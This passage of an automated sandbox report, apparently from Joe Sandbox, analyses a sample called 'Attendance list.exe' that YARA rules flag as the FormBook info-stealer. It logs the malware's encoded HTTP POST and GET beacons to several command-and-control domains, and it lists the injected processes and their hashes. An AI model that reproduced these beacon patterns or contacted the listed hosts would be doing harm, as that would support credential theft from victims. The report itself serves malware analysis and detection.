                      29 | 192.168.2.5 | 49741 | 213.145.228.16 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:53.138400078 CEST | 781 | OUT | POST /aroo/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sandranoll.com
                      Origin: http://www.sandranoll.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.sandranoll.com/aroo/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:17:53.832395077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:53 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      30 | 192.168.2.5 | 49742 | 213.145.228.16 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:55.674478054 CEST | 801 | OUT | POST /aroo/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sandranoll.com
                      Origin: http://www.sandranoll.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.sandranoll.com/aroo/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:17:56.395361900 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:56 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      31 | 192.168.2.5 | 49743 | 213.145.228.16 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:58.216372013 CEST | 1818 | OUT | POST /aroo/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sandranoll.com
                      Origin: http://www.sandranoll.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.sandranoll.com/aroo/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:17:58.912574053 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:58 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      32 | 192.168.2.5 | 49744 | 213.145.228.16 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:00.747570038 CEST | 524 | OUT | GET /aroo/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.sandranoll.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:18:01.447443962 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:18:01 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Ascii: ce9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                      Jul 2, 2024 07:18:01.447515011 CEST | 1236 | IN
                      Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                      Jul 2, 2024 07:18:01.447526932 CEST | 1111 | IN
                      Data Ascii: th:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png" alt="Gratis Basis Hosting" /></td><td style="width:300px;">Gratis Basis Hosting f&uuml;r jede Domain bei Dom
                      Jul 2, 2024 07:18:01.450016975 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      33 | 192.168.2.5 | 49745 | 91.195.240.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:06.490978956 CEST | 781 | OUT | POST /tf44/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.gipsytroya.com
                      Origin: http://www.gipsytroya.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.gipsytroya.com/tf44/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPIORqu8IMTSbyb6RhTD9E1gV4/QuDwEeHWz6P94=
                      Jul 2, 2024 07:18:07.127055883 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                      date: Tue, 02 Jul 2024 05:18:07 GMT
                      content-type: text/html
                      content-length: 556
                      server: Parking/1.0
                      connection: close
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      34 | 192.168.2.5 | 49746 | 91.195.240.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:09.029320955 CEST | 801 | OUT | POST /tf44/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.gipsytroya.com
                      Origin: http://www.gipsytroya.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.gipsytroya.com/tf44/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVMtosYZSAl3d1jKRqtEMHUL3BdzZl8HJIPx/1pB
                      Jul 2, 2024 07:18:09.665121078 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                      date: Tue, 02 Jul 2024 05:18:09 GMT
                      content-type: text/html
                      content-length: 556
                      server: Parking/1.0
                      connection: close
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      35 | 192.168.2.5 | 49747 | 91.195.240.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:11.566694975 CEST | 1818 | OUT | POST /tf44/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.gipsytroya.com
                      Origin: http://www.gipsytroya.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.gipsytroya.com/tf44/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      36 | 192.168.2.5 | 49748 | 91.195.240.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:14.093550920 CEST | 524 | OUT | GET /tf44/?66s0QHx=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.gipsytroya.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:18:14.753308058 CEST | 113 | IN | HTTP/1.1 439
                      date: Tue, 02 Jul 2024 05:18:14 GMT
                      content-length: 0
                      server: Parking/1.0
                      connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      37 | 192.168.2.5 | 49749 | 194.58.112.174 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:19.901547909 CEST | 796 | OUT | POST /mooq/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.helpers-lion.online
                      Origin: http://www.helpers-lion.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.helpers-lion.online/mooq/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrDHiNdqOQOb+SpbkSCGoSa6NlyhKyJWUArqGi+64=
                      Jul 2, 2024 07:18:20.619415045 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:20 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      38 | 192.168.2.5 | 49750 | 194.58.112.174 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:22.648730040 CEST | 816 | OUT | POST /mooq/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.helpers-lion.online
                      Origin: http://www.helpers-lion.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.helpers-lion.online/mooq/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JahdiyCFYm1pxJWSgts9rNnpbO+XB0Z8rvbPBvu1
                      Jul 2, 2024 07:18:23.609554052 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:23 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Jul 2, 2024 07:18:23.609858036 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:23 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      39 | 192.168.2.5 | 49751 | 194.58.112.174 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:18:25.186091900 CEST | 1833 | OUT | POST /mooq/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.helpers-lion.online
                      Origin: http://www.helpers-lion.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.helpers-lion.online/mooq/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:18:25.903903961 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:25 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip


                      Session ID:40
                      Source IP:192.168.2.5
                      Source Port:49752
                      Destination IP:194.58.112.174
                      Destination Port:80
                      PID:6600
                      Process:C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp:Jul 2, 2024 07:18:27.780798912 CEST
                      Bytes transferred:529
                      Direction:OUT
                      Data:GET /mooq/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.helpers-lion.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Timestamp:Jul 2, 2024 07:18:28.479067087 CEST
                      Bytes transferred:1236
                      Direction:IN
                      Data:HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:28 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close


                      Session ID:41
                      Source IP:192.168.2.5
                      Source Port:49753
                      Destination IP:172.67.210.102
                      Destination Port:80
                      PID:6600
                      Process:C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp:Jul 2, 2024 07:18:33.529294968 CEST
                      Bytes transferred:778
                      Direction:OUT
                      Data:POST /lfkn/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.dmtxwuatbz.cc
                      Origin: http://www.dmtxwuatbz.cc
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.dmtxwuatbz.cc/lfkn/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID:42
                      Source IP:192.168.2.5
                      Source Port:49754
                      Destination IP:172.67.210.102
                      Destination Port:80
                      PID:6600
                      Process:C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp:Jul 2, 2024 07:18:36.061328888 CEST
                      Bytes transferred:798
                      Direction:OUT
                      Data:POST /lfkn/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.dmtxwuatbz.cc
                      Origin: http://www.dmtxwuatbz.cc
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.dmtxwuatbz.cc/lfkn/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID:43
                      Source IP:192.168.2.5
                      Source Port:49755
                      Destination IP:172.67.210.102
                      Destination Port:80
                      PID:6600
                      Process:C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp:Jul 2, 2024 07:18:38.591787100 CEST
                      Bytes transferred:1815
                      Direction:OUT
                      Data:POST /lfkn/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.dmtxwuatbz.cc
                      Origin: http://www.dmtxwuatbz.cc
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.dmtxwuatbz.cc/lfkn/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID:44
                      Source IP:192.168.2.5
                      Source Port:49756
                      Destination IP:172.67.210.102
                      Destination Port:80
                      PID:6600
                      Process:C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp:Jul 2, 2024 07:18:41.124767065 CEST
                      Bytes transferred:523
                      Direction:OUT
                      Data:GET /lfkn/?66s0QHx=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT4CuBs9Ly3z32vNrKxrasIe0t0HCtUE4LbxPxJKDUCSn2XA==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.dmtxwuatbz.cc
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Target ID:0
                      Start time:01:14:48
                      Start date:02/07/2024
                      Path:C:\Users\user\Desktop\Attendance list.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Attendance list.exe"
                      Imagebase:0x8c0000
                      File size:1'193'472 bytes
                      MD5 hash:8A08778411F99D8DB7790CB7F0A84E3B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:01:14:49
                      Start date:02/07/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Attendance list.exe"
                      Imagebase:0x370000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:true

                      Target ID:3
                      Start time:01:14:59
                      Start date:02/07/2024
                      Path:C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe"
                      Imagebase:0x120000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:4
                      Start time:01:15:01
                      Start date:02/07/2024
                      Path:C:\Windows\SysWOW64\clip.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\clip.exe"
                      Imagebase:0x300000
                      File size:24'576 bytes
                      MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
